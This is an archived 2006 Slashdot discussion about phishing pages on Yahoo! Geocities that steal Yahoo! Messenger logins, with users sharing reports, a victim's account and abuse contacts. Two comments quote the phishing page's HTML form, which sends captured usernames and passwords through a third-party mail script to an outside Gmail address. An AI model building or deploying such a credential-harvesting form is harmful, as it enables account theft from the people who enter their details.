Catch up on stories from the past week (and beyond) at the Slashdot story archive

 



Forgot your password?
typodupeerror
Check out the new SourceForge HTML5 internet speed test! No Flash necessary and runs on all devices. ×

Phishing in Yahoo! Geocities? 54

Van Cutter Romney asks: "I've received a lot of phishing IMs on my Yahoo! Messenger from contacts whose accounts I guess have been hacked into. All the phishing messages lead to Geocities websites like this where the user is displayed a Yahoo! login page. For most people, the page looks legitimate and they enter their Yahoo! username and password (I was nearly fooled once). Since both the website (Geocities) and the messenger belong to Yahoo!, I'd like to know if they are doing to anything to counter these attacks."
This discussion has been archived. No new comments can be posted.

Phishing in Yahoo! Geocities?

Comments Filter:
  • by Anonymous Coward on Tuesday July 11, 2006 @08:52PM (#15702636)
    Did you report it to Yahoo!? Or just Slashdot?
  • and I quote:

    "NOTICE: We collect personal information on this site."

    Ya think?!?

    I never made the connection! Thanks Mr. Obvious!
  • something to do (Score:4, Interesting)

    by ianpatt ( 52996 ) on Tuesday July 11, 2006 @08:58PM (#15702656)
    For those of you who are bored, you could try to get any of the addresses listed in the web form taken down.

    <FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
    <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
    <INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
    <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">

    I'm sure google would have a fun time going after whoever referred havinfunfun@gmail.com.
  • by walnutmon ( 988223 ) on Tuesday July 11, 2006 @08:59PM (#15702659)
    When I was asked for my username, password, and sexual orientation...
  • by Anonymous Coward on Tuesday July 11, 2006 @09:08PM (#15702688)
    and I didn't see anything.

    What gives?

  • by Anonymous Coward on Tuesday July 11, 2006 @09:11PM (#15702696)
    And yet the worst fishing site [geocities.com] on geocities is still up-- since something like 1998? Someone's asleep at the wheel.
    • And yet the worst fishing site on geocities is still up-- since something like 1998? Someone's asleep at the wheel.

      Ill be honest. I spent all that time to trying to figure out how the website was trying scam people out of money. Then I realized that it was nothing more that a pun. Great job and very subtle and it somehow being modded insightful made it even more funnyy.
  • by Anonymous Coward
    I found it obvious when I right clicked the page and it said Content (C) Flickr...I mean, the site says we are owned by Yahoo! then they claim Flickr owns the content.

    Also consider the SSL link seems to not be phished. I tried dummy data in both login forms and it said "Page Not Found" for the phished page that was not secured, while it said "ID not found" when I entered the information on SSL site. Someone should report the site http://www2.fiberbit.net/ [fiberbit.net] to the domain registrar since the form submissi
  • People who use Flickr rock!
    Not only does Flickr make you smell better, it also makes you more attractive.
  • by The MAZZTer ( 911996 ) <megazzt&gmail,com> on Tuesday July 11, 2006 @09:21PM (#15702737) Homepage

    Username: ohgodatleastspendthe
    Password: $5foradomainname

    The destination page is a 404 (I don't think it works?).

  • old news... (Score:1, Redundant)

    by josepha48 ( 13953 )
    I've known about this since December of 2005.

    You are about 8 months late!

    I initially was told that all you had to do was go to the site, by my roommate, but after a while found out he lied to me, and he logged in like this guy posted.

    I've since got him the netcraft toolbar, which tells and can block you from going to phish sites, or at least warn you about it.

  • Ummm (Score:5, Insightful)

    by Otter ( 3800 ) on Tuesday July 11, 2006 @09:25PM (#15702752) Journal
    Since both the website (Geocities) and the messenger belong to Yahoo!, I'd like to know if they are doing to anything to counter these attacks.

    Maybe I'm missing something, but why the hell are you asking us?

    • Maybe I'm missing something, but why the hell are you asking us?

      Maybe he expects us to take them down via the slashdot effect.
  • Terms of service (Score:5, Informative)

    by Spy der Mann ( 805235 ) <spydermann.slashdot@gmail . c om> on Tuesday July 11, 2006 @09:35PM (#15702795) Homepage Journal
    report the webpage and you're done.

    Geocities is a kinda abandoned place (So much that webcomics make fun of it [nyud.net]). There's no customer service, everything's automated there. The only thing that (I hope) isn't, is the "report offensive page" etc. The only change done to it was aesthetic and in the code. But the infrastructure remains.

    In other words, geocities servers do NOT have personnel searching and identifying phishing sites on them. They have to rely on the users.

    (This and popup ads led to the fall of free homepages. Most pages now are categorized in specialized sites: webcomics, blogs, art, fiction, and with youtube, videos).

    This was bound to happen sooner or later. Yahoo neglected geocities, is it a mystery that it became a meeting point for illegal activities?
    • Well they have one of the best Instant Messengers to phish your passwords with. And imagine what happens now that they have your username and password. do you know how many people have their personal information in Yahoo! Mail?
  • The next version of Geocities will require the user to check a box verifying that he is not a phisher.
  • If you view the source of the form on the phishing site you'll see that email address, it suuuure would be fun to spam that with fake info. Other info from the form that might be useful is:

    Subject: "Yahoo id"
    the URL for the mail form thats used is: http://www2.fiberbit.net/form/mailto.cgi [fiberbit.net]
  • The usernames and passwords might go to a gmail account, but not sure it actually does or not - depends on the mailto.cgi.

    Extract:
    <FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
    <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
    <INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
    <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo
  • by Anonymous Coward
  • Security problems (Score:1, Interesting)

    by Anonymous Coward
    Yahoo! has huge security problems with their accounts. So does Hotmail. I'm not going to get into the details, but let me say this. For my friends and family who forgot their password to their Yahoo! account, it's fairly easy to get their account back for them.
  • yes, we are (Score:3, Informative)

    by Anonymous Coward on Tuesday July 11, 2006 @10:53PM (#15703094)
    While I work for Yahoo! I do not speak for them officially. I do not work on any of the products mentioned.

    We do have teams of people who work to fight any abuse of any of our products. When sites like those are found, they are taken down.

    Please report any instances of situations like those you described to:

    http://abuse.yahoo.com/ [yahoo.com] or abuse@yahoo-inc.com
  • Oh, C'mon!!!... (Score:3, Informative)

    by BlueStrat ( 756137 ) on Wednesday July 12, 2006 @12:54AM (#15703448)
    Who *doesn't* know that Yahoo/Geocities is a major phishing/script-kiddie resource and host?? This isn't news to anyone who has experience chatting in Yahoo chatrooms.

    There are script-kiddies and S/N stealers that constantly use geocities pages to host everything from phishing pages to outright trojan .exe files, disguised as videos or whatever, that they spam links to in yahoo chatrooms with, in an almost constant barrage.

    There is a subgroup of huge-egoed "1337" yahoo chatters that deal in stolen screen names and "illegal" or "illy" names in trade for other names, or straight cash.

    Yahoo seems to pay no attention whatsoever to their abuse reporting system. I've reported a geocities page hosting a trojan multiple times, and the site remained up for over a year, with the same trojan .exe file.

    One of the biggest things driving this subgroup of crackers and script-kiddies are the chat-bot spammers, who buy lists of stolen screen-names/accounts on which to log-on their spam/porn bots. There is an entire underground economy of stolen accounts/screen-names much larger and much older than any of the MMORPG gold trader/seller economies that have gotten so much press of late.

    I think Yahoo, despite all of their denials, are in bed with the spam/porn-bot operators, and turn a blind eye, even protecting them. I know people who chat on Yahoo that run "booter" programs that will kick/flood a chatter out of a room, even completely disconnect someone from Yahoo. They regularly boot normal chatters with impunity, but fear to boot "porn/spam-bots", as Yahoo will quickly shut down the booters' "bot" account(s) (most 'booter' programs utilise 'bots' to send their disconnect packets/IM floods/etc) and even ban the booter-operators' account and block that IP address.

    If I were this fellow, I'd consider myself lucky that the only thing he got from a geocities webpage was a phishing page, as opposed to a virus or trojan with much more serious and far-reaching consequences than having a Yahoo screen-name/account cracked or stolen.

    Cheers!

    Strat
  • by antdude ( 79039 ) on Wednesday July 12, 2006 @01:42AM (#15703572) Homepage Journal
    Yup, I was a victim of this YM phishing because of my dumb user error. Here's my story...

    I wasn't fully awake to notice the URLs because it was the middle of the night. I got a YM IM in my Trillian from someone whom I haven't heard from for months. It went like this (note: actual account/user names changed from their original ones):

    Session Start (ant:onion): Sat Jan 07 02:28:11 2006
    [02:28] onion: Hey check out this website for some photos of me tell me what you think http://www.myphoto-album.tk/ [myphoto-album.tk]
    [02:28] *** Auto-response sent to onion: ant isn't around here at the moment.
    [03:03] ant: I don't see anything even after logging in.
    [03:03] *** You are currently disconnected. Messages will not be received.
    [03:03] *** You are currently disconnected. Messages will not be received.
    [03:04] *** You are currently disconnected. Messages will not be received.
    [03:04] *** You are currently disconnected. Messages will not be received.
    Session Close (onion): Sat Jan 07 03:07:05 2006

    I thought YM servers went down or something. In the day time, it hit me. I got phished! My password was already changed (duh!).

    I quickly e-mailed Yahoo! A few days later, Y! asked for my information that I used to sign up. The problem here was I never used real personal datas in online accounts like Y! nor do I remember them. Plus, I signed up for my account like a decade ago.

    My buddies on the contact list (had a local back up copy so easy to contact) all got this phish. I already warned them not to reply. But some of them were too late and actually fell for it.

    I continued to e-mail Y!, but got no where. I eventually gave up and them told to shut down my account. However, Y! still refused. Of course, my buddies saw the fake me and phish IMs. Eventually, I told all my buddies fill out the online abuse forms to Yahoo!'s abuse department to shut down my account for phishing. Then, I never heard of more online sightings and phishings from my account.

    Here were two Web sites that were for collecting passwords (also contacted the hosts about my incidents). These fake Y!'s GeoCities were gone within days:
    www.my-photo-albums.tk
    www.myphoto-album.tk

    I was glad I didn't use Yahoo account other than IM and launch.com. I hate these bundled services within a single account like Passport. :(

    As you can see social engineering at its best even on people who knows computers. I fell for it. :(
  • You could also send the info to the site below. I've been sending them a lot of my email phish and it they seem to be pretty active in getting sites taken down. Thank goodness! My Dad had a PayPal phish the other day that said something like "confirm you submitted this payment blahblah" for some item he hadn't actually bought. The scary thing was, the phish email actually had his real name in it. Luckily, the phish site had already been taken down when he tried to go to it to give them his PayPal info...

    h [castlecops.com]

If bankers can count, how come they have eight windows and only four tellers?

Working...